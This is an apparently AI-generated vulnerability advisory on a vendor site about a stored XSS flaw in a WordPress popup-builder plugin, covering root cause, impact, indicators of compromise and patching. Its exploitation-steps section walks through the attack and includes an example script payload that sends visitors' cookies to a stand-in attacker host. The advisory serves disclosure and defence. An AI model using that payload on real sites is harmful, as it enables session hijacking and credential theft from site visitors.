CVE-2025-14506: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-14506 is a Stored Cross-Site Scripting (XSS) vulnerability in the ConvertForce Popup Builder plugin for WordPress. It affects all versions up to and including 0.0.7, where the Gutenberg block's entrance_animation attribute lacks proper input sanitization and output escaping. The vulnerability was disclosed on January 10, 2026, and was reported by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, NVD).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), stemming from insufficient input sanitization and output escaping in the plugin's Gutenberg block handling code, specifically in inc/Blocks/Conversion.php at lines 47 and 66. An authenticated attacker with Author-level access or higher can supply a malicious value to the entrance_animation attribute of the ConvertForce Popup Builder Gutenberg block, which is then stored and rendered unsanitized in page output. The attack vector is network-based with low attack complexity and low privileges required, and no user interaction is needed beyond a victim visiting the injected page (Wordfence, WordPress Trac).

Impact

Successful exploitation allows an authenticated attacker (Author-level or above) to persistently inject arbitrary JavaScript into WordPress pages, which executes in the browsers of all users who visit the affected pages. This can lead to session cookie theft, credential harvesting, redirection to malicious sites, or defacement of site content. The scope is changed, meaning the injected scripts can affect users beyond the attacker's own session, impacting site visitors' confidentiality and integrity (Wordfence).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.03%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum Author-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the ConvertForce Popup Builder plugin at version 0.0.7 or earlier, using tools like WPScan or manual inspection of plugin directories.
  2. Obtain Author-level access: Authenticate to the WordPress site with an account that has at minimum Author-level privileges (e.g., through credential theft, phishing, or a compromised account).
  3. Create or edit a post/page: Navigate to the WordPress block editor (Gutenberg) and add a ConvertForce Popup Builder block to a post or page.
  4. Inject malicious payload: Set the entrance_animation attribute of the block to a crafted XSS payload, such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>, exploiting the lack of input sanitization.
  5. Publish the content: Save and publish the post or page containing the injected block.
  6. Payload execution: When any site visitor loads the affected page, the stored malicious script executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to /wp-admin/post.php or REST API endpoints (/wp-json/wp/v2/posts) containing script tags or encoded JavaScript in block attribute data; audit log entries showing Author-level users editing posts with ConvertForce Popup Builder blocks.
  • File System: Unexpected modifications to post content in the WordPress database (wp_posts table) containing <script> tags or JavaScript event handlers within ConvertForce block markup.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after loading pages containing ConvertForce Popup Builder blocks; unusual traffic patterns to attacker-controlled infrastructure.
  • Application: Presence of ConvertForce Popup Builder plugin version 0.0.7 or earlier (/wp-content/plugins/convertforce-popup-builder/) on the server (Wordfence).

Mitigation and workarounds

The vulnerability was patched in the changeset 3419678 for the ConvertForce Popup Builder plugin, which introduced proper input sanitization and output escaping for the entrance_animation attribute. WordPress site administrators should update the ConvertForce Popup Builder plugin to a version beyond 0.0.7 immediately. As a temporary workaround, restrict Author-level and above user accounts to trusted individuals only, or deactivate and remove the plugin until a patched version is confirmed installed (WordPress Trac, Wordfence).

Community reactions

Wordfence included this vulnerability in their weekly WordPress vulnerability report for January 5–11, 2026, highlighting it as part of a broader set of plugin vulnerabilities discovered that week (Wordfence Blog). The vulnerability received standard coverage from security aggregators such as VulDB, Vulners, and CIRCL, with no notable controversy or significant community discussion beyond routine disclosure (VulDB).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management